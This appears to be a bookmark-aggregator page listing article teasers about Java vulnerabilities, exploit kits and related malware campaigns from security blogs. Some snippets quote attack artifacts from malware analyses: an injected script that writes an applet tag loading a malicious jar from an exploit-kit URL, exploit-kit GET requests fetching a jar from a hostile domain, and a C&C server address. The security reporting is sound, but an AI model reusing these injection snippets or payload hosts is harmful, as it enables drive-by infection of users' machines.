Researchers: Oracle’s Java Security Fails – Krebs on Security
Faced with an onslaught of malware attacks that leverage vulnerabilities and design weaknesses in Java, Oracle Corp. recently tweaked things so that Java now warns users about the security risks of running Java content. But new research suggests that the integrity and accuracy of these warning messages can be subverted easily in any number of ways, and that Oracle’s new security scheme actually pu
Anti-decompiling techniques in malicious Java Applets
Step 1: How this started While I was investigating the Trojan.JS.Iframe.aeq case (see blogpost) one of the files dropped by the Exploit Kit was an Applet exploiting a vulnerability: <script> document.write(‘<applet archive=“dyJhixy.jar” code=“QPAfQoaG.ZqnpOsRRk”><param value=“http://fast_DELETED_er14.biz/zHvFxj0QRZA/04az-G112lI05m_AF0Y_C5s0Ip-Vk05REX_0AOq_e0skJ/A0tqO-Z0hT_el0iDbi0-4pxr17_11r_09ERI
News from the Lab Archive : January 2004 to September 2015
A few days after Oracle released its critical patch for Java, and CVE-2013-2423 is already being exploited. Upon checking the history, the exploitation seems to have begun on April 21st and is still actively happening (as of this post): For a closer look, the image below contains a comparison of the classes found in the Metasploit module and that of the ITW sample: Interestingly, the Metasploit mo
CVE-2013-2423 integrating Exploit Kits
One week after Patch Java7u21 the vulnerability is being exploited in mass blind attack. ( First alert come from Timo Hirvonen with CrimeBoss and later CritXPack/SafePack. Will update for these EK as soon as i land on it) Cool EK: GET http://lekarskiejowlslight.ahmedpekin .net/works-softly.htm 200 OK (text/html) GET http://lekarskiejowlslight.ahmedpekin .net/hopeful_orchestra-surveyor_remove.jar 2
New Java 0-Day Attack Echoes Bit9 Breach – Krebs on Security
Once again, attackers are leveraging a previously unknown critical security hole in Java to break into targeted computers. Interestingly, the malware and networks used in this latest attack match those found in the recently disclosed breach at security firm Bit9. The discovery of the Java zero-day is being co-credited to FireEye and CyberESI, two companies that specialize in tracking cyber espiona
Endpoint Protection - Symantec Enterprise
Latest Java Zero-Day Shares Connections with Bit9 Security Incident Symantec recently received information on a new Java zero-day, Oracle Java Runtime Environment CVE-2013-1493 Remote Code Execution Vulnerability (CVE-2013-1493). The final payload in the attack consisted of a DLL file, detected by Symantec as Trojan.Naid, which connects to a command-and-control (C&C) server at 110.173.55.187. Int
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
Java based Cross platform malware targeting Apache Tomcat servers in the wild
Android Malware Eavesdrops on Users, Uses Google+ as Disguise
jre7u21 and earlier Click-2-Play Warning Bypass integrating Exploit Kits
Android Malware Eavesdrops on Users, Uses Google+ as Disguise
Android Malware Eavesdrops on Users, Uses Google+ as Disguise
Warning : Java 6 vulnerable to zero-day exploit; added to Neutrino exploit kit
Blogs
Blogs
CVE-2013-2465/CVE-2013-2471/CVE-2013-2463 integrating Exploit Kits -- jre7u21 CVE- jre6u45 and earlier
Naked Security – Sophos News
Naked Security – Sophos News
Unfixed Reflection API vulnerability reported in Java
Java enabled browsers are highly vulnerable
Another Java zero-day vulnerability being exploited in the wild